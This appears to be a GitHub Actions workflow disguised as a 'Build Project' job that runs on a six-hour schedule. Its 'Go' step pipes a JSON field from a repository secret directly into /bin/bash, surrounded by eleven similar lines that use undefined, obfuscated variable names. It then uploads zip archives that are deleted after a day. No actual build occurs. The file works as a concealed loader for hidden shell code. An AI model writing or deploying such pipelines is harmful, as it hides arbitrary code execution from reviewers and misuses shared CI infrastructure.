name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '4 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          a05: ${{ secrets.a05 }}
        run: |
          printf '%s' "$a05" | jq -r .nup41 | /bin/bash
          echo $il43 | jq -r .xpulq7533 | /bin/bash
          printf '%s' "$jtuc1" | jq -r .eck3 | /bin/bash
          echo $fredm4 | jq -r .a7790 | /bin/bash
          echo $t75 | jq -r .a0 | /bin/bash
          echo $qd8 | jq -r .xebbp506 | /bin/bash
          printf '%s' "$jtqri061" | jq -r .epquh16 | /bin/bash
          echo $rd9747 | jq -r .zec15250 | /bin/bash
          echo $oluvu857 | jq -r .oh6 | /bin/bash
          echo $wp3 | jq -r .fe75 | /bin/bash
          echo $xwiv10 | jq -r .nbjvp9996 | /bin/bash
          echo $ouhcm5683 | jq -r .sifd9164 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: jyO7CakJ
          path: "*.zip"
          retention-days: 1
